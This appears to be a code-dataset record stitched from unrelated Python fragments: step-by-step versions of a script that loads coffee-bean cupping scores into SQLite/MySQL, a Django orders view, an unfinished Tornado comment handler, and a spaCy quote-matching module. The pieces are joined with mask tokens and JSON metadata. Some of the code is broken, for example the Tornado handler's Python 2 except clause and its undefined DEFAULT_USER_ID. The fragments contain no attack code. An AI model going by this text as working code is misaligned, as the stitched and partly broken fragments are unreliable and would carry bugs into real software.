raw_data.iloc[i]['Owner.1']), country=str(raw_data.iloc[i][\n 'Country.of.Origin']), farm_name=str(raw_data.iloc[i][\n 'Farm.Name']), company=str(raw_data.iloc[i]['Company']),\n region=str(raw_data.iloc[i]['Region']), producer=str(\n raw_data.iloc[i]['Producer']), grading_date=str(raw_data.\n iloc[i]['Grading.Date']), processing_method=str(raw_data.\n iloc[i]['Processing.Method']), aroma=float(raw_data.iloc[i]\n ['Aroma']), flavor=float(raw_data.iloc[i]['Flavor']),\n aftertaste=float(raw_data.iloc[i]['Aftertaste']), acidity=\n float(raw_data.iloc[i]['Acidity']), body=float(raw_data.\n iloc[i]['Body']), balance=float(raw_data.iloc[i]['Balance']\n ), uniformity=float(raw_data.iloc[i]['Uniformity']),\n cleancup=float(raw_data.iloc[i]['Clean.Cup']), sweetness=\n float(raw_data.iloc[i]['Sweetness']), total_cup_point=float\n (raw_data.iloc[i]['Total.Cup.Points']), moisture=float(\n raw_data.iloc[i]['Moisture']), color=str(raw_data.iloc[i][\n 'Color']), cluster=int(raw_data.iloc[i]['cluster']))\n session.add(bean_row)\n logger.debug('Row %d added to table ' % i)\n session.commit()\n except sql.exc.IntegrityError:\n logger.error('Duplicated coffee bean')\n except Exception as e:\n logger.error('Incorrect credentials, access denied', e)\n finally:\n session.close()\n\n\nif __name__ == '__main__':\n conn_type = 'mysql+pymysql'\n user = os.environ.get('MYSQL_USER')\n password = os.environ.get('MYSQL_PASSWORD')\n host = os.environ.get('MYSQL_HOST')\n port = os.environ.get('MYSQL_PORT')\n database = os.environ.get('DATABASE_NAME')\n local_database_path = config.LOCAL_DATABASE_PATH\n if config.SQLALCHEMY_DATABASE_URI is None:\n if config.LOCAL_DB_FLAG:\n engine_string = 'sqlite:///{}'.format(local_database_path)\n else:\n engine_string = '{}://{}:{}@{}:{}/{}'.format(conn_type, user,\n password, host, port, database)\n else:\n engine_string = config.SQLALCHEMY_DATABASE_URI\n try:\n engine_string = 'sqlite:///data/bean.db'\n persist_to_db(engine_string)\n logger.info('Data successfully persisted into the database')\n except Exception as e:\n logger.error(e)\n sys.exit(1)\n",
"step-3": "<mask token>\nsys.path.append('./config')\n<mask token>\nlogging.basicConfig(level=logging.INFO, format=\n '%(name)s - %(levelname)s - %(asctime)s - %(message)s')\nlogger = logging.getLogger(__file__)\nBase = declarative_base()\n\n\nclass BeanAttributes(Base):\n \"\"\" Defines the data model for the table `bean_attributes`. \"\"\"\n __tablename__ = 'bean_attributes'\n id = Column(Integer, primary_key=True)\n species = Column(String(100), unique=False, nullable=True)\n owner = Column(String(100), unique=False, nullable=True)\n country = Column(String(100), unique=False, nullable=True)\n farm_name = Column(String(100), unique=False, nullable=True)\n company = Column(String(100), unique=False, nullable=True)\n region = Column(String(100), unique=False, nullable=True)\n producer = Column(String(100), unique=False, nullable=True)\n grading_date = Column(String(100), unique=False, nullable=True)\n processing_method = Column(Text, unique=False, nullable=True)\n aroma = Column(Float, unique=False, nullable=True)\n flavor = Column(Float, unique=False, nullable=True)\n aftertaste = Column(Float, unique=False, nullable=True)\n acidity = Column(Float, unique=False, nullable=True)\n body = Column(Float, unique=False, nullable=True)\n balance = Column(Float, unique=False, nullable=True)\n uniformity = Column(Float, unique=False, nullable=True)\n cleancup = Column(Float, unique=False, nullable=True)\n sweetness = Column(Float, unique=False, nullable=True)\n total_cup_point = Column(Float, unique=False, nullable=True)\n moisture = Column(Float, unique=False, nullable=True)\n color = Column(String(100), unique=False, nullable=True)\n cluster = Column(Integer, unique=False, nullable=True)\n\n def __repr__(self):\n return '<BeanAttributes %r>' % self.id\n\n\ndef persist_to_db(engine_string):\n \"\"\"Persist the data to database.\n Args:\n engine_string (`str`): Engine string for SQLAlchemy.\n Returns:\n None.\n \"\"\"\n engine = sql.create_engine(engine_string)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n if config.LOCAL_DB_FLAG:\n try:\n session.execute('DELETE FROM msia_db.bean_attributes')\n except:\n pass\n else:\n try:\n session.execute('DELETE FROM bean_attributes')\n except:\n pass\n raw_data = pd.read_csv(config.DATA_TABLE_PATH)\n raw_data = raw_data.replace(np.nan, '', regex=True)\n try:\n for i in range(raw_data.shape[0]):\n bean_row = BeanAttributes(id=int(raw_data.iloc[i]['Unnamed: 0']\n ), species=str(raw_data.iloc[i]['Species']), owner=str(\n raw_data.iloc[i]['Owner.1']), country=str(raw_data.iloc[i][\n 'Country.of.Origin']), farm_name=str(raw_data.iloc[i][\n 'Farm.Name']), company=str(raw_data.iloc[i]['Company']),\n region=str(raw_data.iloc[i]['Region']), producer=str(\n raw_data.iloc[i]['Producer']), grading_date=str(raw_data.\n iloc[i]['Grading.Date']), processing_method=str(raw_data.\n iloc[i]['Processing.Method']), aroma=float(raw_data.iloc[i]\n ['Aroma']), flavor=float(raw_data.iloc[i]['Flavor']),\n aftertaste=float(raw_data.iloc[i]['Aftertaste']), acidity=\n float(raw_data.iloc[i]['Acidity']), body=float(raw_data.\n iloc[i]['Body']), balance=float(raw_data.iloc[i]['Balance']\n ), uniformity=float(raw_data.iloc[i]['Uniformity']),\n cleancup=float(raw_data.iloc[i]['Clean.Cup']), sweetness=\n float(raw_data.iloc[i]['Sweetness']), total_cup_point=float\n (raw_data.iloc[i]['Total.Cup.Points']), moisture=float(\n raw_data.iloc[i]['Moisture']), color=str(raw_data.iloc[i][\n 'Color']), cluster=int(raw_data.iloc[i]['cluster']))\n session.add(bean_row)\n logger.debug('Row %d added to table ' % i)\n session.commit()\n except sql.exc.IntegrityError:\n logger.error('Duplicated coffee bean')\n except Exception as e:\n logger.error('Incorrect credentials, access denied', e)\n finally:\n session.close()\n\n\nif __name__ == '__main__':\n conn_type = 'mysql+pymysql'\n user = os.environ.get('MYSQL_USER')\n password = os.environ.get('MYSQL_PASSWORD')\n host = os.environ.get('MYSQL_HOST')\n port = os.environ.get('MYSQL_PORT')\n database = os.environ.get('DATABASE_NAME')\n local_database_path = config.LOCAL_DATABASE_PATH\n if config.SQLALCHEMY_DATABASE_URI is None:\n if config.LOCAL_DB_FLAG:\n engine_string = 'sqlite:///{}'.format(local_database_path)\n else:\n engine_string = '{}://{}:{}@{}:{}/{}'.format(conn_type, user,\n password, host, port, database)\n else:\n engine_string = config.SQLALCHEMY_DATABASE_URI\n try:\n engine_string = 'sqlite:///data/bean.db'\n persist_to_db(engine_string)\n logger.info('Data successfully persisted into the database')\n except Exception as e:\n logger.error(e)\n sys.exit(1)\n",
"step-4": "import os\nimport sys\nimport logging.config\nimport sqlalchemy as sql\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Float, String, Text, Integer\nimport pandas as pd\nimport numpy as np\nsys.path.append('./config')\nimport config\nlogging.basicConfig(level=logging.INFO, format=\n '%(name)s - %(levelname)s - %(asctime)s - %(message)s')\nlogger = logging.getLogger(__file__)\nBase = declarative_base()\n\n\nclass BeanAttributes(Base):\n \"\"\" Defines the data model for the table `bean_attributes`. \"\"\"\n __tablename__ = 'bean_attributes'\n id = Column(Integer, primary_key=True)\n species = Column(String(100), unique=False, nullable=True)\n owner = Column(String(100), unique=False, nullable=True)\n country = Column(String(100), unique=False, nullable=True)\n farm_name = Column(String(100), unique=False, nullable=True)\n company = Column(String(100), unique=False, nullable=True)\n region = Column(String(100), unique=False, nullable=True)\n producer = Column(String(100), unique=False, nullable=True)\n grading_date = Column(String(100), unique=False, nullable=True)\n processing_method = Column(Text, unique=False, nullable=True)\n aroma = Column(Float, unique=False, nullable=True)\n flavor = Column(Float, unique=False, nullable=True)\n aftertaste = Column(Float, unique=False, nullable=True)\n acidity = Column(Float, unique=False, nullable=True)\n body = Column(Float, unique=False, nullable=True)\n balance = Column(Float, unique=False, nullable=True)\n uniformity = Column(Float, unique=False, nullable=True)\n cleancup = Column(Float, unique=False, nullable=True)\n sweetness = Column(Float, unique=False, nullable=True)\n total_cup_point = Column(Float, unique=False, nullable=True)\n moisture = Column(Float, unique=False, nullable=True)\n color = Column(String(100), unique=False, nullable=True)\n cluster = Column(Integer, unique=False, nullable=True)\n\n def __repr__(self):\n return '<BeanAttributes %r>' % self.id\n\n\ndef persist_to_db(engine_string):\n \"\"\"Persist the data to database.\n Args:\n engine_string (`str`): Engine string for SQLAlchemy.\n Returns:\n None.\n \"\"\"\n engine = sql.create_engine(engine_string)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n if config.LOCAL_DB_FLAG:\n try:\n session.execute('DELETE FROM msia_db.bean_attributes')\n except:\n pass\n else:\n try:\n session.execute('DELETE FROM bean_attributes')\n except:\n pass\n raw_data = pd.read_csv(config.DATA_TABLE_PATH)\n raw_data = raw_data.replace(np.nan, '', regex=True)\n try:\n for i in range(raw_data.shape[0]):\n bean_row = BeanAttributes(id=int(raw_data.iloc[i]['Unnamed: 0']\n ), species=str(raw_data.iloc[i]['Species']), owner=str(\n raw_data.iloc[i]['Owner.1']), country=str(raw_data.iloc[i][\n 'Country.of.Origin']), farm_name=str(raw_data.iloc[i][\n 'Farm.Name']), company=str(raw_data.iloc[i]['Company']),\n region=str(raw_data.iloc[i]['Region']), producer=str(\n raw_data.iloc[i]['Producer']), grading_date=str(raw_data.\n iloc[i]['Grading.Date']), processing_method=str(raw_data.\n iloc[i]['Processing.Method']), aroma=float(raw_data.iloc[i]\n ['Aroma']), flavor=float(raw_data.iloc[i]['Flavor']),\n aftertaste=float(raw_data.iloc[i]['Aftertaste']), acidity=\n float(raw_data.iloc[i]['Acidity']), body=float(raw_data.\n iloc[i]['Body']), balance=float(raw_data.iloc[i]['Balance']\n ), uniformity=float(raw_data.iloc[i]['Uniformity']),\n cleancup=float(raw_data.iloc[i]['Clean.Cup']), sweetness=\n float(raw_data.iloc[i]['Sweetness']), total_cup_point=float\n (raw_data.iloc[i]['Total.Cup.Points']), moisture=float(\n raw_data.iloc[i]['Moisture']), color=str(raw_data.iloc[i][\n 'Color']), cluster=int(raw_data.iloc[i]['cluster']))\n session.add(bean_row)\n logger.debug('Row %d added to table ' % i)\n session.commit()\n except sql.exc.IntegrityError:\n logger.error('Duplicated coffee bean')\n except Exception as e:\n logger.error('Incorrect credentials, access denied', e)\n finally:\n session.close()\n\n\nif __name__ == '__main__':\n conn_type = 'mysql+pymysql'\n user = os.environ.get('MYSQL_USER')\n password = os.environ.get('MYSQL_PASSWORD')\n host = os.environ.get('MYSQL_HOST')\n port = os.environ.get('MYSQL_PORT')\n database = os.environ.get('DATABASE_NAME')\n local_database_path = config.LOCAL_DATABASE_PATH\n if config.SQLALCHEMY_DATABASE_URI is None:\n if config.LOCAL_DB_FLAG:\n engine_string = 'sqlite:///{}'.format(local_database_path)\n else:\n engine_string = '{}://{}:{}@{}:{}/{}'.format(conn_type, user,\n password, host, port, database)\n else:\n engine_string = config.SQLALCHEMY_DATABASE_URI\n try:\n engine_string = 'sqlite:///data/bean.db'\n persist_to_db(engine_string)\n logger.info('Data successfully persisted into the database')\n except Exception as e:\n logger.error(e)\n sys.exit(1)\n",
"step-5": "import os\nimport sys\nimport logging.config\nimport sqlalchemy as sql\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Float, String, Text, Integer\nimport pandas as pd\nimport numpy as np\nsys.path.append('./config')\nimport config\n\nlogging.basicConfig(level=logging.INFO, format='%(name)s - %(levelname)s - %(asctime)s - %(message)s')\nlogger = logging.getLogger(__file__)\n\nBase = declarative_base()\n\nclass BeanAttributes(Base):\n \"\"\" Defines the data model for the table `bean_attributes`. \"\"\"\n\n __tablename__ = 'bean_attributes'\n\n id = Column(Integer, primary_key=True)\n species = Column(String(100), unique=False, nullable=True)\n owner = Column(String(100), unique=False, nullable=True)\n country = Column(String(100), unique=False, nullable=True)\n farm_name = Column(String(100), unique=False, nullable=True)\n company = Column(String(100), unique=False, nullable=True)\n region = Column(String(100), unique=False, nullable=True)\n producer = Column(String(100), unique=False, nullable=True)\n grading_date = Column(String(100), unique=False, nullable=True)\n processing_method = Column(Text, unique=False, nullable=True)\n aroma = Column(Float, unique=False, nullable=True)\n flavor = Column(Float, unique=False, nullable=True)\n aftertaste = Column(Float, unique=False, nullable=True)\n acidity = Column(Float, unique=False, nullable=True)\n body = Column(Float, unique=False, nullable=True)\n balance = Column(Float, unique=False, nullable=True)\n uniformity = Column(Float, unique=False, nullable=True)\n cleancup = Column(Float, unique=False, nullable=True)\n sweetness = Column(Float, unique=False, nullable=True)\n total_cup_point = Column(Float, unique=False, nullable=True)\n moisture = Column(Float, unique=False, nullable=True)\n color = Column(String(100), unique=False, nullable=True)\n cluster = Column(Integer, unique=False, nullable=True)\n\n def __repr__(self):\n return '<BeanAttributes %r>' % self.id\n\n\ndef persist_to_db(engine_string):\n \"\"\"Persist the data to database.\n Args:\n engine_string (`str`): Engine string for SQLAlchemy.\n Returns:\n None.\n \"\"\"\n\n engine = sql.create_engine(engine_string)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n\n # Delete all existing records in the table\n if config.LOCAL_DB_FLAG:\n try:\n session.execute('''DELETE FROM msia_db.bean_attributes''')\n except:\n pass\n else:\n try:\n session.execute('''DELETE FROM bean_attributes''')\n except:\n pass\n\n # Read the data table and persist it into the database\n raw_data = pd.read_csv(config.DATA_TABLE_PATH)\n raw_data = raw_data.replace(np.nan, '', regex=True)\n\n try:\n for i in range(raw_data.shape[0]):\n bean_row = BeanAttributes(id=int(raw_data.iloc[i]['Unnamed: 0']),\n species=str(raw_data.iloc[i]['Species']),\n owner=str(raw_data.iloc[i]['Owner.1']),\n country=str(raw_data.iloc[i]['Country.of.Origin']),\n farm_name=str(raw_data.iloc[i]['Farm.Name']),\n company=str(raw_data.iloc[i]['Company']),\n region=str(raw_data.iloc[i]['Region']),\n producer=str(raw_data.iloc[i]['Producer']),\n grading_date=str(raw_data.iloc[i]['Grading.Date']),\n processing_method=str(raw_data.iloc[i]['Processing.Method']),\n aroma=float(raw_data.iloc[i]['Aroma']),\n flavor=float(raw_data.iloc[i]['Flavor']),\n aftertaste=float(raw_data.iloc[i]['Aftertaste']),\n acidity=float(raw_data.iloc[i]['Acidity']),\n body=float(raw_data.iloc[i]['Body']),\n balance=float(raw_data.iloc[i]['Balance']),\n uniformity=float(raw_data.iloc[i]['Uniformity']),\n cleancup=float(raw_data.iloc[i]['Clean.Cup']),\n sweetness=float(raw_data.iloc[i]['Sweetness']),\n total_cup_point=float(raw_data.iloc[i]['Total.Cup.Points']),\n moisture=float(raw_data.iloc[i]['Moisture']),\n color=str(raw_data.iloc[i]['Color']),\n cluster=int(raw_data.iloc[i]['cluster'])\n )\n session.add(bean_row)\n logger.debug('Row %d added to table ' % i)\n session.commit()\n except sql.exc.IntegrityError: # Check primary key duplication\n logger.error(\"Duplicated coffee bean\")\n except Exception as e:\n logger.error(\"Incorrect credentials, access denied\", e)\n finally:\n session.close()\n\n\nif __name__ == \"__main__\":\n\n # Obtain parameters from os\n conn_type = \"mysql+pymysql\"\n user = os.environ.get(\"MYSQL_USER\")\n password = os.environ.get(\"MYSQL_PASSWORD\")\n host = os.environ.get(\"MYSQL_HOST\")\n port = os.environ.get(\"MYSQL_PORT\")\n database = os.environ.get(\"DATABASE_NAME\")\n local_database_path = config.LOCAL_DATABASE_PATH\n\n # If users wish to write to their own SQLALCHEMY_DATABASE_URI in the environment\n if config.SQLALCHEMY_DATABASE_URI is None:\n # Whether to create a local SQLite database or an AWS RDS database\n if config.LOCAL_DB_FLAG:\n engine_string = \"sqlite:///{}\".format(local_database_path)\n else:\n engine_string = \"{}://{}:{}@{}:{}/{}\".format(conn_type, user, password, host, port, database)\n else:\n engine_string = config.SQLALCHEMY_DATABASE_URI\n\n try:\n engine_string = 'sqlite:///data/bean.db'\n persist_to_db(engine_string)\n logger.info(\"Data successfully persisted into the database\")\n except Exception as e:\n logger.error(e)\n sys.exit(1)\n\n\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
from django.views.generic import TemplateView, FormView, CreateView, ListView
from .models import Order
from .form import OrderForm
class OrdersListView(ListView):
template_name = 'orders/index.html'
queryset = Order.objects.all()
context_object_name = 'order_list'
class OrderCreateView(CreateView):
template_name = 'orders/form.html'
form_class = OrderForm
success_url = '/'
|
normal
|
{
"blob_id": "afd184962e8e69843ca518e140d5fdde3d7c9ed2",
"index": 7456,
"step-1": "<mask token>\n\n\nclass OrderCreateView(CreateView):\n template_name = 'orders/form.html'\n form_class = OrderForm\n success_url = '/'\n",
"step-2": "<mask token>\n\n\nclass OrdersListView(ListView):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass OrderCreateView(CreateView):\n template_name = 'orders/form.html'\n form_class = OrderForm\n success_url = '/'\n",
"step-3": "<mask token>\n\n\nclass OrdersListView(ListView):\n template_name = 'orders/index.html'\n queryset = Order.objects.all()\n context_object_name = 'order_list'\n\n\nclass OrderCreateView(CreateView):\n template_name = 'orders/form.html'\n form_class = OrderForm\n success_url = '/'\n",
"step-4": "from django.views.generic import TemplateView, FormView, CreateView, ListView\nfrom .models import Order\nfrom .form import OrderForm\n\n\nclass OrdersListView(ListView):\n template_name = 'orders/index.html'\n queryset = Order.objects.all()\n context_object_name = 'order_list'\n\n\nclass OrderCreateView(CreateView):\n template_name = 'orders/form.html'\n form_class = OrderForm\n success_url = '/'\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import tornado.web
from sqlalchemy import desc
from sqlalchemy.orm import contains_eager
from main_app.models.post import Post
from main_app.models.thread import PostThread, User2Thread
from main_app.handlers.base_handler import BaseHandler
class API_Comments(BaseHandler):
def post(self):
'''
add comment to a post
example:
POST /comment
body: post_id, text
returns:
200 - the comment created
406 - incorrect data
'''
arg_comment = self.get_argument('comment')
try:
post_id = int(arg_comment['post_id'])
text = str(arg_comment['text'])
except KeyError, ValueError:
raise tornado.web.HTTPError(406)
if not text:
# the comment text is empty
raise tornado.web.HTTPError(406)
# get post + thread + User2Thread
post = self.db.query(Post).\
join(
PostThread, Post.thread_id == PostThread.id
).join(
User2Thread
).options(
contains_eager(PostThread.user2thread)
).filter(
Post.id == post_id
).filter(
User2Thread.user_id.in_(DEFAULT_USER_ID, self.current_user),
).filter(
User2Thread.is_current()
).filter(
User2Thread.allow_add_posts == True
).order_by(
desc(User2Thread.user_id)
).first()
|
normal
|
{
"blob_id": "5186400c9b3463d6be19e73de665f8792d8d68c7",
"index": 6982,
"step-1": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport tornado.web\n\nfrom sqlalchemy import desc\nfrom sqlalchemy.orm import contains_eager\n\nfrom main_app.models.post import Post\nfrom main_app.models.thread import PostThread, User2Thread\n\nfrom main_app.handlers.base_handler import BaseHandler\n\n\nclass API_Comments(BaseHandler):\n\n def post(self):\n '''\n add comment to a post\n\n example:\n POST /comment\n body: post_id, text\n\n returns:\n 200 - the comment created\n 406 - incorrect data\n '''\n arg_comment = self.get_argument('comment')\n try:\n post_id = int(arg_comment['post_id'])\n text = str(arg_comment['text'])\n except KeyError, ValueError:\n raise tornado.web.HTTPError(406)\n if not text:\n # the comment text is empty\n raise tornado.web.HTTPError(406)\n # get post + thread + User2Thread\n post = self.db.query(Post).\\\n join(\n PostThread, Post.thread_id == PostThread.id\n ).join(\n User2Thread\n ).options(\n contains_eager(PostThread.user2thread)\n ).filter(\n Post.id == post_id\n ).filter(\n User2Thread.user_id.in_(DEFAULT_USER_ID, self.current_user),\n ).filter(\n User2Thread.is_current()\n ).filter(\n User2Thread.allow_add_posts == True\n ).order_by(\n desc(User2Thread.user_id)\n ).first()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
## Author: Aleem Juma
import os
from app import app
import pandas as pd
# read in the quotes database
q = pd.read_csv(os.path.join('app','data','quotes_all.csv'), sep=';', skiprows=1, header=0)
# there are a few quote genres that don't occur in the model vocab
# replace them with appropriate words so the similarity search works
replace = {
'movingon':'moving',
'fathersday': 'fathers',
'memorialday': 'memorial',
'mothersday': 'mothers',
'newyears': 'year',
'saintpatricksday': 'ireland',
'valentinesday': 'valentine'
}
q['GENRE'].replace(to_replace=replace, inplace=True)
import spacy
nlp = spacy.load('en_core_web_md')
# cache the computed tokens for the genres in the dataset
cache = {genre:nlp(genre) for genre in q.GENRE.unique()}
def get_similarity(word1, word2):
'''
Returns a similarity score between two words
'''
tok1 = cache.get(word1, nlp(word1))
tok2 = cache.get(word2, nlp(word2))
return tok1.similarity(tok2)
def get_random_word():
'''
Returns a random category label from the data
'''
random_word = q['GENRE'].sample(1).iloc[0]
return random_word
def get_closest_words(word, choices, n=1):
'''
Returns the n closest matches in the model vocab
Parameters:
word word to search
choices available matches
n number of results to return
Returns:
A list of n tuples in the form (word (str), similarity (float))
'''
app.logger.info(f'Finding closest words to "{word}"')
if word in choices:
# if the word is already in the list return the same word with 100% match
return [(word, 1.0)]
if word in nlp.vocab.strings:
# if not in the list, find the closest words
similarities = [(choice, get_similarity(word, choice)) for choice in choices]
# sort, reverse, and return the top n (word,similarity) tuples
return sorted(similarities, key=lambda x: x[1])[::-1][:n]
else:
app.logger.info(f'Not in model vocab: "{word}"')
# if the requested label isn't in the model vocab, return a random genre
return [(get_random_word(), 1.0), (word, 0.0)]
def find_matching_quote(genre, top_n=5):
'''
Returns a matching quote and up to 5 of the most similar genres with similarity measures
Paramters:
genre genre to match
Returns:
(str) Quote
(str) Author
(list) List of tuples in the form (word (str), simliarity (float))
'''
# find closest matches
matched_genres = get_closest_words(genre, q.GENRE.unique(), top_n)
# get the best one
closest = matched_genres[0][0]
app.logger.info(f'Finding quote for: "{closest}"')
# get a quote from that genre
matching_quote = q[q['GENRE']==closest].sample(1).iloc[0]
quote = matching_quote.QUOTE
author = matching_quote.AUTHOR
# return the quote and the genres
return quote, author, matched_genres
|
normal
|
{
"blob_id": "8f854f4f2c807f988945af4dc53dba93cfb31168",
"index": 9441,
"step-1": "<mask token>\n\n\ndef get_similarity(word1, word2):\n \"\"\"\n Returns a similarity score between two words\n \"\"\"\n tok1 = cache.get(word1, nlp(word1))\n tok2 = cache.get(word2, nlp(word2))\n return tok1.similarity(tok2)\n\n\n<mask token>\n\n\ndef get_closest_words(word, choices, n=1):\n \"\"\"\n Returns the n closest matches in the model vocab\n Parameters:\n word word to search\n choices available matches\n n number of results to return\n\n Returns:\n A list of n tuples in the form (word (str), similarity (float))\n \"\"\"\n app.logger.info(f'Finding closest words to \"{word}\"')\n if word in choices:\n return [(word, 1.0)]\n if word in nlp.vocab.strings:\n similarities = [(choice, get_similarity(word, choice)) for choice in\n choices]\n return sorted(similarities, key=lambda x: x[1])[::-1][:n]\n else:\n app.logger.info(f'Not in model vocab: \"{word}\"')\n return [(get_random_word(), 1.0), (word, 0.0)]\n\n\ndef find_matching_quote(genre, top_n=5):\n \"\"\"\n Returns a matching quote and up to 5 of the most similar genres with similarity measures\n Paramters:\n genre genre to match\n\n Returns:\n (str) Quote\n (str) Author\n (list) List of tuples in the form (word (str), simliarity (float))\n \"\"\"\n matched_genres = get_closest_words(genre, q.GENRE.unique(), top_n)\n closest = matched_genres[0][0]\n app.logger.info(f'Finding quote for: \"{closest}\"')\n matching_quote = q[q['GENRE'] == closest].sample(1).iloc[0]\n quote = matching_quote.QUOTE\n author = matching_quote.AUTHOR\n return quote, author, matched_genres\n",
"step-2": "<mask token>\nq['GENRE'].replace(to_replace=replace, inplace=True)\n<mask token>\n\n\ndef get_similarity(word1, word2):\n \"\"\"\n Returns a similarity score between two words\n \"\"\"\n tok1 = cache.get(word1, nlp(word1))\n tok2 = cache.get(word2, nlp(word2))\n return tok1.similarity(tok2)\n\n\ndef get_random_word():\n \"\"\"\n Returns a random category label from the data\n \"\"\"\n random_word = q['GENRE'].sample(1).iloc[0]\n return random_word\n\n\ndef get_closest_words(word, choices, n=1):\n \"\"\"\n Returns the n closest matches in the model vocab\n Parameters:\n word word to search\n choices available matches\n n number of results to return\n\n Returns:\n A list of n tuples in the form (word (str), similarity (float))\n \"\"\"\n app.logger.info(f'Finding closest words to \"{word}\"')\n if word in choices:\n return [(word, 1.0)]\n if word in nlp.vocab.strings:\n similarities = [(choice, get_similarity(word, choice)) for choice in\n choices]\n return sorted(similarities, key=lambda x: x[1])[::-1][:n]\n else:\n app.logger.info(f'Not in model vocab: \"{word}\"')\n return [(get_random_word(), 1.0), (word, 0.0)]\n\n\ndef find_matching_quote(genre, top_n=5):\n \"\"\"\n Returns a matching quote and up to 5 of the most similar genres with similarity measures\n Paramters:\n genre genre to match\n\n Returns:\n (str) Quote\n (str) Author\n (list) List of tuples in the form (word (str), simliarity (float))\n \"\"\"\n matched_genres = get_closest_words(genre, q.GENRE.unique(), top_n)\n closest = matched_genres[0][0]\n app.logger.info(f'Finding quote for: \"{closest}\"')\n matching_quote = q[q['GENRE'] == closest].sample(1).iloc[0]\n quote = matching_quote.QUOTE\n author = matching_quote.AUTHOR\n return quote, author, matched_genres\n",
"step-3": "<mask token>\nq = pd.read_csv(os.path.join('app', 'data', 'quotes_all.csv'), sep=';',\n skiprows=1, header=0)\nreplace = {'movingon': 'moving', 'fathersday': 'fathers', 'memorialday':\n 'memorial', 'mothersday': 'mothers', 'newyears': 'year',\n 'saintpatricksday': 'ireland', 'valentinesday': 'valentine'}\nq['GENRE'].replace(to_replace=replace, inplace=True)\n<mask token>\nnlp = spacy.load('en_core_web_md')\ncache = {genre: nlp(genre) for genre in q.GENRE.unique()}\n\n\ndef get_similarity(word1, word2):\n \"\"\"\n Returns a similarity score between two words\n \"\"\"\n tok1 = cache.get(word1, nlp(word1))\n tok2 = cache.get(word2, nlp(word2))\n return tok1.similarity(tok2)\n\n\ndef get_random_word():\n \"\"\"\n Returns a random category label from the data\n \"\"\"\n random_word = q['GENRE'].sample(1).iloc[0]\n return random_word\n\n\ndef get_closest_words(word, choices, n=1):\n \"\"\"\n Returns the n closest matches in the model vocab\n Parameters:\n word word to search\n choices available matches\n n number of results to return\n\n Returns:\n A list of n tuples in the form (word (str), similarity (float))\n \"\"\"\n app.logger.info(f'Finding closest words to \"{word}\"')\n if word in choices:\n return [(word, 1.0)]\n if word in nlp.vocab.strings:\n similarities = [(choice, get_similarity(word, choice)) for choice in\n choices]\n return sorted(similarities, key=lambda x: x[1])[::-1][:n]\n else:\n app.logger.info(f'Not in model vocab: \"{word}\"')\n return [(get_random_word(), 1.0), (word, 0.0)]\n\n\ndef find_matching_quote(genre, top_n=5):\n \"\"\"\n Returns a matching quote and up to 5 of the most similar genres with similarity measures\n Paramters:\n genre genre to match\n\n Returns:\n (str) Quote\n (str) Author\n (list) List of tuples in the form (word (str), simliarity (float))\n \"\"\"\n matched_genres = get_closest_words(genre, q.GENRE.unique(), top_n)\n closest = matched_genres[0][0]\n app.logger.info(f'Finding quote for: \"{closest}\"')\n matching_quote = q[q['GENRE'] == closest].sample(1).iloc[0]\n quote = matching_quote.QUOTE\n author = matching_quote.AUTHOR\n return quote, author, matched_genres\n",
"step-4": "import os\nfrom app import app\nimport pandas as pd\nq = pd.read_csv(os.path.join('app', 'data', 'quotes_all.csv'), sep=';',\n skiprows=1, header=0)\nreplace = {'movingon': 'moving', 'fathersday': 'fathers', 'memorialday':\n 'memorial', 'mothersday': 'mothers', 'newyears': 'year',\n 'saintpatricksday': 'ireland', 'valentinesday': 'valentine'}\nq['GENRE'].replace(to_replace=replace, inplace=True)\nimport spacy\nnlp = spacy.load('en_core_web_md')\ncache = {genre: nlp(genre) for genre in q.GENRE.unique()}\n\n\ndef get_similarity(word1, word2):\n \"\"\"\n Returns a similarity score between two words\n \"\"\"\n tok1 = cache.get(word1, nlp(word1))\n tok2 = cache.get(word2, nlp(word2))\n return tok1.similarity(tok2)\n\n\ndef get_random_word():\n \"\"\"\n Returns a random category label from the data\n \"\"\"\n random_word = q['GENRE'].sample(1).iloc[0]\n return random_word\n\n\ndef get_closest_words(word, choices, n=1):\n \"\"\"\n Returns the n closest matches in the model vocab\n Parameters:\n word word to search\n choices available matches\n n number of results to return\n\n Returns:\n A list of n tuples in the form (word (str), similarity (float))\n \"\"\"\n app.logger.info(f'Finding closest words to \"{word}\"')\n if word in choices:\n return [(word, 1.0)]\n if word in nlp.vocab.strings:\n similarities = [(choice, get_similarity(word, choice)) for choice in\n choices]\n return sorted(similarities, key=lambda x: x[1])[::-1][:n]\n else:\n app.logger.info(f'Not in model vocab: \"{word}\"')\n return [(get_random_word(), 1.0), (word, 0.0)]\n\n\ndef find_matching_quote(genre, top_n=5):\n \"\"\"\n Returns a matching quote and up to 5 of the most similar genres with similarity measures\n Paramters:\n genre genre to match\n\n Returns:\n (str) Quote\n (str) Author\n (list) List of tuples in the form (word (str), simliarity (float))\n \"\"\"\n matched_genres = get_closest_words(genre, q.GENRE.unique(), top_n)\n closest = matched_genres[0][0]\n app.logger.info(f'Finding quote for: \"{closest}\"')\n matching_quote = q[q['GENRE'] == closest].sample(1).iloc[0]\n quote = matching_quote.QUOTE\n author = matching_quote.AUTHOR\n return quote, author, matched_genres\n",
